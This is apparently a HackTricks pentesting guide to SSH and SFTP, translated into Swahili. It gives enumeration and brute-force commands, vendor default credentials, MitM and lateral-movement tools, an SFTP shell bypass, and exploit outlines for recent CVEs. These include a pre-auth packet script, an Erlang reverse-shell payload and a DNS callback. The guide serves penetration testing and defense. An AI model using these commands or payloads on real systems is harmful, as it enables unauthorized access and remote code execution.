22 - Pentesting SSH/SFTP

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Taarifa za Msingi

SSH (Secure Shell or Secure Socket Shell) ni itifaki ya mtandao inayowezesha muunganisho salama kwa kompyuta kupitia mtandao usio salama. Ni muhimu kwa kudumisha usiri na uadilifu wa data unapofikia mifumo ya mbali.

Bandari ya chaguo-msingi: 22

22/tcp open  ssh     syn-ack

SSH servers:

  • openSSH – OpenBSD SSH, hutolewa kwenye BSD, usambazaji wa Linux na Windows tangu Windows 10
  • Dropbear – utekekelishaji wa SSH kwa mazingira yenye kumbukumbu na rasilimali ndogo za processor, hutolewa katika OpenWrt
  • PuTTY – utekekelishaji wa SSH kwa Windows; mteja hutumika kawaida lakini matumizi ya seva ni nadra
  • CopSSH – utekekelishaji wa OpenSSH kwa Windows

SSH libraries (implementing server-side):

  • libssh – maktaba ya C ya multi-platform inayotekeleza itifaki ya SSHv2 na bindings katika [Python], [Perl] na [R]; inatumiwa na KDE kwa sftp na na GitHub kwa miundombinu ya git SSH
  • wolfSSH – maktaba ya seva ya SSHv2 imeandikwa kwa ANSI C na inalenga mazingira ya embedded, RTOS, na mazingira yenye rasilimali ndogo
  • Apache MINA SSHD – maktaba ya Apache SSHD ya Java inatokana na Apache MINA
  • paramiko – maktaba ya Python ya itifaki SSHv2

Enumeration

nc -vn <IP> 22

Otomatiki ssh-audit

ssh-audit ni zana ya ukaguzi wa usanidi wa server na client za ssh.

https://github.com/jtesta/ssh-audit is an updated fork from https://github.com/arthepsy/ssh-audit/

Vipengele:

  • SSH1 and SSH2 protocol server support;
  • chambua usanidi wa client wa SSH;
  • kuchukua banner, kutambua kifaa au programu na mfumo wa uendeshaji, kugundua compression;
  • kusanya algorithms za key-exchange, host-key, encryption na message authentication code;
  • tolea taarifa za algorithms (inapatikana tangu, zilizoondolewa/zimesimamishwa, hatari/dhaifu/za zamani, n.k.);
  • tolea mapendekezo ya algorithms (ongeza au ondoa kulingana na toleo la programu lililotambuliwa);
  • tolea taarifa za usalama (masuala yanayohusiana, orodha ya CVE zilizotolewa, n.k.);
  • chambua ulinganishaji wa toleo la SSH kulingana na taarifa za algorithms;
  • taarifa za kihistoria kutoka OpenSSH, Dropbear SSH na libssh;
  • inaendesha kwenye Linux na Windows;
  • hakuna utegemezi
usage: ssh-audit.py [-1246pbcnjvlt] <host>

-1,  --ssh1             force ssh version 1 only
-2,  --ssh2             force ssh version 2 only
-4,  --ipv4             enable IPv4 (order of precedence)
-6,  --ipv6             enable IPv6 (order of precedence)
-p,  --port=<port>      port to connect
-b,  --batch            batch output
-c,  --client-audit     starts a server on port 2222 to audit client
software config (use -p to change port;
use -t to change timeout)
-n,  --no-colors        disable colors
-j,  --json             JSON output
-v,  --verbose          verbose output
-l,  --level=<level>    minimum output level (info|warn|fail)
-t,  --timeout=<secs>   timeout (in seconds) for connection and reading
(default: 5)
$ python3 ssh-audit <IP>

See it in action (Asciinema)

Ufunguo wa umma wa SSH wa seva

ssh-keyscan -t rsa <IP> -p <PORT>

Algoritimu Dhaifu za Cipher

Hii inagunduliwa kwa chaguo-msingi na nmap. Hata hivyo, unaweza pia kutumia sslcan au sslyze.

Skripti za Nmap

nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
nmap -p22 <ip> --script ssh2-enum-algos # Retrieve supported algorythms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

Shodan

  • ssh

Brute force usernames, passwords and private keys

Username Enumeration

Katika baadhi ya matoleo ya OpenSSH unaweza kufanya timing attack ili enumerate users. Unaweza kutumia metasploit module ili ku-exploit hili:

msf> use scanner/ssh/ssh_enumusers

Brute force

Baadhi ya common ssh credentials ziko here and here na hapa chini.

Private Key Brute Force

Kama unajua baadhi ya ssh private keys ambazo zinaweza kutumika… tujaribu. Unaweza kutumia the nmap script:

https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html

Au MSF auxiliary module:

msf> use scanner/ssh/ssh_identify_pubkeys

Au tumia ssh-keybrute.py (native python3, lightweight and has legacy algorithms enabled): snowdroppe/ssh-keybrute.

Badkeys zilizojulikana zinaweza kupatikana hapa:

ssh-badkeys/authorized at master \xc2\xb7 rapid7/ssh-badkeys \xc2\xb7 GitHub

Vifunguo dhaifu vya SSH / Debian predictable PRNG

Baadhi ya mifumo ina dosari zinazojulikana katika random seed inayotumika kuzalisha cryptographic material. Hii inaweza kusababisha keyspace kupungua kwa kiasi kikubwa ambayo inaweza ku-bruteforce. Seti zilizotayarishwa awali za keys zilizozalishwa kwenye mifumo za Debian zilizoathiriwa na weak PRNG zinapatikana hapa: g0tmi1k/debian-ssh.

Unapaswa kutazama hapa ili kutafuta keys halali za mashine ya lengo.

Kerberos / GSSAPI SSO

Ikiwa target SSH server inasaidia GSSAPI (kwa mfano Windows OpenSSH kwenye domain controller), unaweza kuthibitisha kwa kutumia Kerberos TGT yako badala ya password.

Workflow kutoka kwenye host ya attacker wa Linux:

# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>

# 2) Generate a krb5.conf for the target realm (optional, but handy)
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf

# 3) Obtain a TGT for the user
kinit <user>
klist

# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>

Notes:

  • Ikiwa utaunganisha kwa jina lisilo sahihi (mfano, short host, alias, au mpangilio mbaya katika /etc/hosts), unaweza kupata: “Server not found in Kerberos database” kwa sababu SPN haifananishi.
  • crackmapexec ssh --kerberos pia inaweza kutumia ccache yako kwa uthibitishaji wa Kerberos.

Vigezo vya Kuingia vya Msingi

MuuzajiMajina ya MtumiajiNenosiri
APCapc, deviceapc
Brocadeadminadmin123, password, brocade, fibranne
Ciscoadmin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladminadmin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrixroot, nsroot, nsmaint, vdiadmin, kvm, cli, adminC1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Linkadmin, userprivate, admin, user
Dellroot, user1, admin, vkernel, clicalvin, 123456, password, vkernel, Stor@ge!, admin
EMCadmin, root, sysadminEMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Comadmin, root, vcx, app, spvar, manage, hpsupport, opc_opadmin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
Huaweiadmin, root123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBMUSERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customerPASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Junipernetscreennetscreen
NetAppadminnetapp123
Oracleroot, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2userchangeme, ilom-admin, ilom-operator, welcome1, oracle
VMwarevi-admin, root, hqadmin, vmware, adminvmware, vmw@re, hqadmin, default

SSH-MitM

Ikiwa uko kwenye mtandao wa ndani na mwathiriwa anatarajiwa kuunganishwa kwa seva ya SSH kwa kutumia jina la mtumiaji na nenosiri, unaweza kujaribu kufanya shambulio la MitM ili kuiba taarifa hizo za kuingia:

Njia ya shambulio:

  • Traffic Redirection: Mshambuliaji anamaelekeza trafiki ya mwathiriwa kwenye mashine yake, kwa hivyo anakamata jaribio la muunganisho kwa seva ya SSH.
  • Interception and Logging: Mashine ya mshambuliaji inafanya kazi kama proxy, inakamata maelezo ya kuingia ya mtumiaji kwa kujifanya kuwa seva halali ya SSH.
  • Command Execution and Relay: Mwisho, seva ya mshambuliaji inarekodi nywila za mtumiaji, inapitisha amri kwa seva halisi ya SSH, inazitekeleza, na inarejesha matokeo kwa mtumiaji, ikifanya mchakato uonekane laini na halali.

SSH MITM inafanya hasa kile kilichoelezewa hapo juu.

Ili kushika/kufanya MitM kwa vitendo unaweza kutumia mbinu kama ARP spoofing, DNS spoofing au nyingine zilizoelezwa katika Network Spoofing attacks.

SSH-Snake

Ikiwa unataka kusafiri kupitia mtandao kwa kutumia funguo za kibinafsi za SSH ulizoziweza kupata kwenye mifumo, ukitumia kila funguo binafsi kwenye kila mfumo kwa mwenyeji mpya, basi SSH-Snake ndicho unachohitaji.

SSH-Snake inafanya kazi zifuatazo kiotomatiki na kwa mfululizo:

  1. Kwenye mfumo wa sasa, tafuta funguo za kibinafsi za SSH,
  2. Kwenye mfumo wa sasa, tafuta mwenyeji au maeneo yoyote (user@host) ambapo funguo binafsi zinaweza kukubaliwa,
  3. Jaribu kuingia kwa SSH kwenye maeneo yote ukitumia funguo zote za kibinafsi zilizogunduliwa,
  4. Ikiwa uunganisho kwenye eneo linalolengwa utafanywa kwa mafanikio, inarudia hatua #1 - #4 kwenye mfumo uliounganishwa.

Inajirudia na kujienea yenyewe kabisa – na haina mafaili kabisa.

Mipangilio Isiyofaa

Kuingia kama root

Ni kawaida kwa seva za SSH kuruhusu kuingia kwa mtumiaji root kwa chaguo-msingi, jambo ambalo linaweka hatari kubwa ya usalama. Kuzima kuingia kwa root ni hatua muhimu katika kusanidi seva kwa usalama. Kufikia ufikiaji usioidhinishwa kwa ruhusa za usimamizi na mashambulio ya brute force kunaweza kupunguzwa kwa kufanya mabadiliko haya.

Kuzuia Kuingia kwa root katika OpenSSH:

  1. Hariri faili la usanidi la SSH kwa: sudoedit /etc/ssh/sshd_config
  2. Badilisha kipimo kutoka #PermitRootLogin yes hadi PermitRootLogin no.
  3. Pakia upya usanidi kwa kutumia: sudo systemctl daemon-reload
  4. Weka upya seva ya SSH ili kutekeleza mabadiliko: sudo systemctl restart sshd

SFTP Brute Force

SFTP command execution

Kuna upotofu wa kawaida katika usanidi wa SFTP, ambapo wasimamizi wanakusudia watumiaji kubadilishana mafaili bila kuruhusu ufikiaji wa shell ya mbali. Licha ya kumtenga mtumiaji kwa shells zisizo za mwingiliano (mfano, /usr/bin/nologin) na kumfunga kwenye saraka maalum, kuna pengo la usalama. Watumiaji wanaweza kukwepa vikwazo hivi kwa kuomba utekelezaji wa amri (kama /bin/bash) mara tu baada ya kuingia, kabla shell yao isiyo ya mwingiliano haijachukua nafasi. Hii inaruhusu utekelezaji usioidhinishwa wa amri, ukiharibu hatua zilizokusudiwa za usalama.

Example from here

ssh -v noraj@192.168.1.94 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 192.168.1.94 ([192.168.1.94]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(noraj) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

$ ssh noraj@192.168.1.94 /bin/bash

Hapa kuna mfano wa usanidi salama wa SFTP (/etc/ssh/sshd_config – openSSH) kwa mtumiaji noraj:

Match User noraj
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
PermitTunnel no
X11Forwarding no
PermitTTY no

Mipangilio hii itaruhusu SFTP pekee: inazuia ufikiaji wa shell kwa kulazimisha start command na kuzima ufikiaji wa TTY, na pia inazuia aina zote za port forwarding au tunneling.

SFTP Tunneling

Ikiwa una ufikiaji wa seva ya SFTP unaweza pia tunnel trafiki yako kupitia hii, kwa mfano kwa kutumia common port forwarding:

sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>

sftp ina amri “symlink”. Kwa hivyo, ikiwa una writable rights katika folda fulani, unaweza kuunda symlinks za folda/mafayela mengine. Kwa kuwa huenda umefungwa ndani ya chroot, hii haitakuwa muhimu sana kwako; lakini, ikiwa unaweza access symlink iliyotengenezwa kutoka kwa no-chroot service (kwa mfano, ikiwa unaweza kufikia symlink kutoka kwenye web), unaweza open the symlinked files through the web.

Kwa mfano, ili kuunda symlink kutoka kwa faili mpya froot” hadi “/:

sftp> symlink / froot

Kama unaweza kufikia faili “froot” kupitia wavuti, utaweza kuorodhesha folda ya root (“/”) ya mfumo.

Mbinu za uthibitishaji

Katika mazingira ya usalama wa juu, ni desturi kuwezesha tu uthibitishaji unaotegemea ufunguo au two-factor badala ya uthibitishaji rahisi unaotegemea password. Lakini mara nyingi mbinu zenye nguvu huwezeshwa bila kuzima zile dhaifu. Mfano wa kawaida ni kuwezesha publickey kwenye usanidi wa openSSH na kuiweka kama njia chaguo-msingi bila kuzima password. Kwa hivyo, kwa kutumia verbose mode ya SSH client, mshambuliaji anaweza kuona kwamba njia dhaifu imewezeshwa:

ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

Kwa mfano, ikiwa authentication failure limit imewekwa na haupati nafasi ya kufikia password method, unaweza kutumia chaguo la PreferredAuthentications kulazimisha kutumia method hii.

ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

Kukagua usanidi wa seva ya SSH ni muhimu ili kuhakikisha kwamba njia zinazotarajiwa tu ndizo zimeruhusiwa. Kutumia modi ya verbose kwenye client kunaweza kusaidia kuona ufanisi wa usanidi.

Faili za usanidi

ssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa

Fuzzing

Udhaifu Muhimu Za Karibuni (2024)

CVE-2024-6387 – regreSSHion signal-handler race

OpenSSH 8.5p1–9.7p1 iliondoa async-safe logging guard ndani ya sshd’s SIGALRM handler, ikirejesha CVE-2006-5051 na kuruhusu wadukuzi wasiojathibitishwa kuharibu heap ya glibc mara LoginGraceTime inapokwisha. Qualys ilitumia mdudu huu kama silaha kwa root RCE kwenye Linux 32-bit na ikabaini kuwa malengo ya 64-bit bado yanaweza kufanyiwa brute-force kwa kutosha kwa majaribio ya kuandaa allocator state, hivyo ipa kipaumbele hosts ambazo bado zinatangaza matoleo hayo wakati wa banner grabs.

Utekelezaji unategemea timing: puliza daemon kwa sessions nusu-wazi ambazo hazijathibitishwa ili privileged monitor ibofye njia hatarishi ya signal mara kwa mara wakati wewe unavyoandaa allocator state.

Vidokezo kwa operator:

  • Fingerprint builds kwa ssh -V (remote banner) au ssh -G <target> | grep ^userauths na thibitisha LoginGraceTime sio sifuri.
  • Fanya pressure-test kwenye target ya maabara kwa ku-spam sessions fupi ambazo hazitaomba authentication, kwa mfano:
parallel -j200 "timeout 3 ssh -o PreferredAuthentications=none -o ConnectTimeout=2 attacker@${TARGET}" ::: {1..4000}
  • Hosts ambazo zinachochea LoginGraceTime 0 haziwezi kugusa njia ya buggy code—tarajia tu kona ya DoS kwa kuchosha MaxStartups.

CVE-2024-3094 – xz/liblzma supply-chain backdoor

XZ Utils 5.6.0 na 5.6.1 zilitolewa na release tarballs zilizokuwa trojanized ambapo build scripts zilifungua object iliyofichwa wakati wa packaging ya Debian/RPM kwenye x86-64 Linux. Payload inatumia IFUNC resolver ya glibc ku-hook RSA_public_decrypt katika sshd (wakati systemd patches zinawafanya liblzma izinduliwe) na inakubali packets zilizotiwa saini na mshambuliaji kwa pre-auth code execution.

Kwa sababu mantiki ya uharibu iko ndani ya binaries zilizopakiwa pekee, uthibitishaji wa mashambulizi lazima uchunguze kile kilichowekwa kwenye mashine ya mwathiriwa: angalia xz --version, rpm -qi xz/dpkg -l xz-utils, linganisha hashes za /usr/lib*/liblzma.so*, na tazama ldd /usr/sbin/sshd | grep -E "systemd|lzma" kuona kama sshd hata inavuta dependency iliyokumbwa. Hook inabaki usingizi isipokuwa njia ya mchakato ni /usr/sbin/sshd, hivyo mara nyingi kuunda upya mazingira ya build ya distro ni lazima ili kuzalisha backdoor kwenye maabara.

Authentication State-Machine Bypass (Pre-Auth RCE)

Seva kadhaa za SSH zina makosa ya mantiki katika authentication finite-state machine ambayo yanamruhusu mteja kutuma ujumbe za connection-protocol kabla authentication haijakamilika. Kwa sababu seva inashindwa kuthibitisha kuwa iko katika state sahihi, ujumbe huo unashughulikiwa kana kwamba mtumiaji ameathibitishwa kikamilifu, na kusababisha unauthenticated code execution au uundaji wa session.

Kiwango cha proto, ujumbe wowote wa SSH wenye message code ≥ 80 (0x50) unahusiana na layer ya connection (RFC 4254) na lazima ukubaliwe tu baada ya authentication kufanikiwa (RFC 4252). Ikiwa seva itash処処liza mmoja wa ujumbe huo wakati bado iko katika state ya SSH_AUTHENTICATION, mshambuliaji anaweza mara moja kuunda channel na kuomba vitendo kama command execution, port-forwarding, n.k.

Generic Exploitation Steps

  1. Anzisha muunganisho wa TCP kwenye port ya SSH ya target (kwa kawaida 22, lakini huduma nyingine zinaweza kufichua Erlang/OTP kwenye 2022, 830, 2222…).
  2. Unda raw SSH packet:
  • 4-byte packet_length (big-endian)
  • 1-byte message_code ≥ 80 (e.g. SSH_MSG_CHANNEL_OPEN = 90, SSH_MSG_CHANNEL_REQUEST = 98)
  • Payload ambayo itafahamika kwa aina ya message uliyoichagua
  1. Tuma packet(s) kabla ya kumaliza hatua yoyote ya authentication.
  2. Shirikiana na server APIs ambazo sasa zimefunuliwa pre-auth (command execution, port forwarding, file-system access, …).

Python proof-of-concept outline:

import socket, struct
HOST, PORT = '10.10.10.10', 22
s = socket.create_connection((HOST, PORT))
# skip version exchange for brevity – send your own client banner then read server banner
# … key exchange can be skipped on vulnerable Erlang/OTP because the bug is hit immediately after the banner
# Packet: len(1)=1, SSH_MSG_CHANNEL_OPEN (90)
pkt  = struct.pack('>I', 1) + b'\x5a'  # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands

Kivitendo utahitaji kufanya (au kuruka) key-exchange kulingana na utekelezaji wa lengo, lakini no authentication haifanywi kamwe.

Erlang/OTP sshd (CVE-2025-32433)

  • Matoleo yaliyoathirika: OTP < 27.3.3, 26.2.5.11, 25.3.2.20
  • Sababu kuu: daemon ya asili ya SSH ya Erlang haithibitishi hali ya sasa kabla ya kuitisha ssh_connection:handle_msg/2. Kwa hivyo, kifurushi chochote chenye msimbo wa ujumbe 80-255 kinamfikia mshughuliki wa muunganisho wakati kikao bado kiko katika hali ya userauth.
  • Athari: unauthenticated remote code execution (daemon kawaida huendesha kama root kwenye vifaa vya embedded/OT).

Mfano wa payload inayozalisha reverse shell iliyounganishwa na attacker-controlled channel:

% open a channel first … then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").

Blind RCE / out-of-band detection inaweza kufanywa kupitia DNS:

execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession

Utambuzi na Kupunguza:

  • Chunguza trafiki ya SSH: tupa kifurushi chochote chenye msimbo wa ujumbe ≥ 80 kinachoonekana kabla ya uthibitisho.
  • Sasisha Erlang/OTP hadi 27.3.3 / 26.2.5.11 / 25.3.2.20 au toleo jipya zaidi.
  • Zuia ufichuzi wa bandari za usimamizi (22/2022/830/2222) – hasa kwenye vifaa vya OT.

Utekelezaji Nyingine Zimeathiriwa

  • libssh 0.6 – 0.8 (server side) – CVE-2018-10933 – inakubali SSH_MSG_USERAUTH_SUCCESS isiyothibitishwa iliyotumwa na mteja, kwa ufanisi ni kasoro ya mantiki kinyume.

Somo la kawaida ni kwamba kutofuatwa kwa mabadiliko ya hali yaliyoainishwa na RFC kunaweza kuwa hatari; wakati wa kukagua au fuzzing daemons za SSH, zingatia hasa state-machine enforcement.

References

Amri za Kiotomatiki za HackTricks

Protocol_Name: SSH
Port_Number: 22
Protocol_Description: Secure Shell Hardening

Entry_1:
Name: Hydra Brute Force
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 {IP} ssh

Entry_2:
Name: consolesless mfs enumeration
Description: SSH enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks